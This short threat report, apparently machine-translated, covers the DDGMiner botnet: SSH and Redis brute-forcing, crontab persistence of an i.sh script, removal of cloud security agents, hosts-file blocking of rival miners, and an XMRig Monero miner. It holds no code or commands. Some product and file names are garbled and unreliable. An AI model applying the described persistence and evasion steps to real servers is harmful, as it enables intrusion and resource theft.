Password blast attacks on SSH server are being initiated by the large mining botnet DDGMiner to mine Monero, consuming excessive system resources and disabling some security products.
Recently, a weak password blast attack on the SSH server was detected by a security researcher. It was an attack initiated by the large mining botnet DDGMiner. It is characterized by scanning and attacking SSH service, Redis database, OrientDB database and other servers, and implanting a mining Trojan on the compromised server to mine Monero for profit. DDGMiner’s main propagation method is still SSH blasting. Hackers first download the shell script i.sh after being hacked through weak passwords or exploits, and install it as a crontab scheduled task to be executed every 15 minutes.The DDG botnet mainly scans the SSH service and the Redis service for violent invasion of the LINUX system to dig Monero for profit. The mining Trojan is continuously being updated by attackers, as 9 new versions were released in the past month alone. After the DDG mining trojan is executed, it will request a configuration file to be downloaded. According to the configuration file, the mining trojan wordpress and virus script i.sh will be executed. In addition, the latest version of the DDG mining trojan will download the uninstall.sh , quartz_uninstall script . sh uninstalls security protection products such as Tencent Yunyun Mirror and Ali Yunan Knight to enhance the survival time of mining Trojans on the server. Virus mining behavior will greatly affect server performance. Additionally, the trojan modifies the hosts file to map the URLs of competing Trojans such as trumpzwlvlyrvlss.onion to the IP address 0.0.0.0 to achieve the purpose of shielding competitors’ Trojan horses from monopolizing system resources. The Monero Mining Trojan wordpress is compiled by the open source mining program XMRig.